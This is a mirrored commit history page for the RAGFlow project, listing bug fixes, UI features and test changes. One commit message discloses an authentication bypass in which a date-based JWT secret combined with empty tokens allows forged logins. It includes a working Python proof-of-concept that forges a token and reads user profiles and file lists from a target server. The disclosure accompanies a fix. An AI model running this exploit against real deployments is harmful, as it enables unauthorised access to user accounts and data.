ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-09-03 05:17:01 +00:00

Author	SHA1	Message	Date
balibabu	7c7359a9b2	Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080 ) ### What problem does this PR solve? Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 15:12:21 +08:00
Liu An	ee52000870	Test: add sdk Dataset test cases (#8077 ) ### What problem does this PR solve? Add sdk dataset test cases ### Type of change - [x] Add test case	2025-06-05 13:20:28 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Stephen Hu	640fca7dc9	Fix: set output for Message template (#8064 ) ### What problem does this PR solve? now Streamning logic is not match with none streaming logic, which may introduce down stream can not find upstream components. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:10:40 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
balibabu	c163b799d2	Feat: Create empty agent #3221 (#8054 ) ### What problem does this PR solve? Feat: Create empty agent #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 12:04:31 +08:00
Liu An	4f3abb855a	Fix: remove zhipu ai api key (#8066 ) ### What problem does this PR solve? - Removed hardcoded Zhipu API key from codebase - New requirement: Tests now require ZHIPU_AI_API_KEY environment variable Example: export ZHIPU_AI_API_KEY=your_api_key_here ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:04:09 +08:00
Mathias Panzenböck	a374816fb2	Don't use '，' (U+FF0C) but ', ' (U+2C U+20) (#8063 ) The Unicode codepoint '，' (U+FF0C) is meant to be used in Chinese text, but this is English text. It looks like a comma followed by a space, but isn't. Of course I didn't change actual Chinese text. ### What problem does this PR solve? Mixup of Unicode characters. This is probably unnoticed by most users, but I wonder if screen readers would read it out differently or if LLMs would trip up on it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [x] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-06-05 09:29:07 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
Kevin Hu	ec60b322ab	Fix: data missing after upgrading. (#8047 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 16:25:34 +08:00
balibabu	8445143359	Feat: Add RunSheet component #3221 (#8045 ) ### What problem does this PR solve? Feat: Add RunSheet component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 15:56:47 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Liu An	73f9c226d3	Fix: Allow None value for parser_config in create_dataset SDK method (#8041 ) ### What problem does this PR solve? Fix parser_config=None handling in create_dataset ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 13:16:32 +08:00
Liu An	52c814b89d	Refa: Move HTTP API tests to top-level test directory (#8042 ) ### What problem does this PR solve? Move test cases only - CI still runs tests under sdk/python ### Type of change - [x] Refactoring	2025-06-04 13:16:17 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
writinwaters	7b268eb134	Docs: Miscellaneous UI updates (#8031 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-04 09:31:41 +08:00
Adrian Altermatt	31d2b3cb5a	Fix: Grammar and clarity improvements in prompt templates (#8023 ) ## Summary Fixed grammar errors and improved clarity in prompt templates throughout `rag/prompts.py`. ## Changes Made - Fixed incomplete sentence: `"If the user's latest question is completely, don't do anything"` → `"If the user's latest question is already complete, don't do anything"` - Improved phrasing: `"of like [ID:i]"` → `"such as [ID:i]"` - Added missing articles: `"give top 3"` → `"give the top 3"` - Fixed prepositions: `"in language of"` → `"in the same language as"` - Corrected spelling: `"Jappanese"` → `"Japanese"` - Standardized formatting: Consistent role descriptions and punctuation ## Impact These changes improve prompt readability and should make instructions clearer for the underlying language models. ## Test Plan - [x] Verified changes maintain original prompt functionality - [x] No breaking changes to prompt structure or expected outputs Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>	2025-06-03 19:41:59 +08:00
balibabu	ef899a8859	Feat: Add DynamicPrompt component #3221 (#8028 ) ### What problem does this PR solve? Feat: Add DynamicPrompt component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 19:41:35 +08:00
balibabu	e47186cc42	Feat: Add AgentNode component #3221 (#8019 ) ### What problem does this PR solve? Feat: Add AgentNode component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 17:42:30 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Stephen Hu	f56f7a5f94	Fix: Set Output In Category Component (#8010 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8006 The category should work well, but the category's downstream seems to be unable to get the upstream output. Add the category's output as an attribute. However, in base.py, there is logic ` if self.component_name.lower().find("switch") < 0 and self.get_component_name(u) in ["relevant", "categorize"]: continue` If goto this cases will not tried to get output from Category (but I do not have full context about this if logic). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:40:16 +08:00
balibabu	4cd0df0567	Feat: Construct RetrievalForm with original fields #3221 (#8012 ) ### What problem does this PR solve? Feat: Construct RetrievalForm with original fields #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 15:40:04 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Liu An	e702431fcb	Feat: sync test group to top pyproject.toml (#8015 ) ### What problem does this PR solve? sync test group from sdk/python/pyproject.toml to top pyproject.toml ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 15:21:06 +08:00
Kevin Hu	156290f8d0	Fix: url path join issue. (#8013 ) ### What problem does this PR solve? Close #7980 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 14:18:40 +08:00
Yongteng Lei	37075eab98	Feat: add voyage-multimodal-3 (#7987 ) ### What problem does this PR solve? Add voyage-multimodal-3. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 11:56:59 +08:00
zstar	37998abef3	Update synonym dictionary file (#7997 ) ### What problem does this PR solve? Update the synonym dictionary file with relevant time and date to prevent synonyms from being mistakenly escaped. ### Type of change - [x] Refactoring	2025-06-03 09:41:53 +08:00
writinwaters	09f8dfe456	Docs: Updated UI tips for reranker (#7983 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-05-30 19:50:30 +08:00
balibabu	259a7fc7f1	Feat: Add the example component of the classification operator #3221 (#7986 ) ### What problem does this PR solve? Feat: Add the example component of the classification operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-30 19:25:32 +08:00
Kevin Hu	93f5df716f	Fix: order chunks from docx by positions. (#7979 ) ### What problem does this PR solve? #7934 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 17:20:53 +08:00
balibabu	9f38b22a3f	Feat: Use one-way data flow to synchronize the form data to the canvas #3221 (#7977 ) ### What problem does this PR solve? Feat: Use one-way data flow to synchronize the form data to the canvas #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-30 16:02:27 +08:00
Yongteng Lei	bd4678bca6	Fix: Unnecessary truncation in markdown parser (#7972 ) ### What problem does this PR solve? Fix unnecessary truncation in markdown parser. So that markdown can work perfectly like [this](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576) in #7824, supporting multiple special delimiters. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 15:04:21 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
CharlesHsu	241fdf266a	Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966 ) Fix: Prevent Flask hot reload from hanging due to early thread startup ### What problem does this PR solve? When running the Flask server with `use_reloader=True` (enabled during debug mode), modifying a Python source file would trigger a reload detection (`Detected change in ...`), but the application would hang instead of restarting cleanly. This was caused by the `update_progress` background thread being started too early, often within the main module scope. This issue was reported in [#7498](https://github.com/infiniflow/ragflow/issues/7498). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --- Summary of changes: - Wrapped `update_progress` launch in a `threading.Timer` with delay to avoid premature thread execution. - Marked thread as `daemon=True` to avoid blocking process exit. - Added `WERKZEUG_RUN_MAIN` environment check to ensure background threads only run in the reloader child process (the actual Flask app). - Retained original behavior in production mode (`debug=False`). --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-30 13:38:30 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
xiaoping	a835e97440	Update docker-compose.yml (#7962 ) If the name field is not specified, Docker Compose will default to using `docker` as the project name. This may cause conflicts with other default projects, leading to unintended operations when executing `docker compose` commands. ### What problem does this PR solve? When executing Docker Compose commands, interference occurs between multiple default projects, leading to operational chaos. ### Type of change - [x] Other (please describe):	2025-05-30 13:10:59 +08:00
dong	62de535ac8	Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968 ) ### What problem does this PR solve? When performing the dify_retrieval, the metadata of the document was empty. ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:58:05 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
balibabu	02db995e94	Feat: Install why-did-you-render to detect component updates #3221 (#7969 ) ### What problem does this PR solve? Feat: Install why-did-you-render to detect component updates #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-30 12:14:44 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The internal is due to when the selected row keys change will trigger a testing, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
balibabu	e97fd2b5e6	Feat: Add InnerBlurInput component to avoid frequent updates of zustand causing the input box to lose focus #3221 (#7955 ) ### What problem does this PR solve? Feat: Add InnerBlurInput component to avoid frequent updates of zustand causing the input box to lose focus #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 19:52:56 +08:00
Yongteng Lei	49ff1ca934	Fix: code debug (#7949 ) ### What problem does this PR solve? Fix code component debug issue. #7908. I delete the additions in #7933, there is no semantic meaning `output` for `parameters`. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-29 16:53:27 +08:00
Yongteng Lei	46963ab1ca	Fix: add advanced delimiter detection for naive merge (#7941 ) ### What problem does this PR solve? Add advanced delimiter detection for naive merge. #7824 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 16:17:22 +08:00
giiiiiithub	6ba5a4348a	set PARALLEL_DEVICES default value= 0 (#7935 ) ### What problem does this PR solve? it would be fail if PARALLEL_DEVICES = None in OCR class , because it pass 0 to TextDetector and TextRecognizer init method. and It would be simpler to set 0 as the default value for PARALLEL_DEVICES. ### Type of change - [x] Refactoring	2025-05-29 13:32:16 +08:00
天海蒼灆	f584f5c3d0	agents openai API add new way to get session_id (#7937 ) ### What problem does this PR solve? SpringAI can only add session_id in metadata。so add new way to get session_id from "id" or "metadata.id" ![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 13:31:17 +08:00
Stephen Hu	a0f76b7a4d	Fix: add default output method for ComponentParamBase (#7933 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7908 For the code ` _, out = cpn.output(allow_partial=False)` ` def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]: o = getattr(self._param, self._param.output_var_name)` need to call this method But I do not have a full context. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-29 11:50:01 +08:00
balibabu	3f695a542c	Feat: Use memo to wrap canvas nodes to improve fluency #3221 (#7929 ) ### What problem does this PR solve? Feat: Use memo to wrap canvas nodes to improve fluency #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 11:10:45 +08:00
Jason Li	64f930b1c5	Truncate long agent descriptions text (#7924 ) Truncate long agent descriptions to prevent overflow outside the agent card container ### What problem does this PR solve? Now the Long text of description will overflow from the agent card, should display the long text properly with truncate. <img width="275" alt="Screenshot 2025-05-28 220329" src="https://github.com/user-attachments/assets/954b3a48-bcab-4669-a42f-6981d4bf859f" /> <img width="275" alt="Screenshot 2025-05-28 220353" src="https://github.com/user-attachments/assets/f385d95a-3e40-4117-b412-ae6a4508e646" /> ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-05-29 11:10:02 +08:00

1 2 3 4 5 ...

3217 Commits